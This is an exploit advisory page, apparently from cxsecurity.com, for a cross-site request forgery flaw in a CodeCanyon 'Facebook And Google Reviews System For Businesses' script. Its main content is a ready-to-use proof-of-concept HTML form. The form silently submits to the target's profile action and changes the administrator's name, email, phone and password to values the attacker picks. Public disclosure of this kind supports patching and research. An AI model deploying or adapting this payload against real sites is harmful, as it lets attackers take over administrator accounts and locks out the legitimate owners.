Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery

2018.12.13
az Veysel Xankisiyev (AZ) az
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery # Date: 2018-12-13 # Exploit Author: Veyselxan # Vendor Homepage:https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559?s_rank=38 # Version: v1 (REQUIRED) # Tested on: Linux # 1 Poof Of Concept (Change password): <html> <body> <form action="http://Target/action.php?action=profile" method="post" class="form-horizontal form-bordered"> <input class="form-control" name="name" value="Admin" type="text"> <input class="form-control" name="email" value="admin@ranksol.com" type="text"> <input class="form-control" name="password" value="password" type="text"> <input class="form-control" name="phone" value="+18323041166" type="text"> <input type="hidden" name="id" value="1"> <button type="submit" name="submit" value="submit" class="btn btn-fill btn-success "><span class="ace-icon fa fa-save bigger-120"></span> Save</button> </form> </body> </html>


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top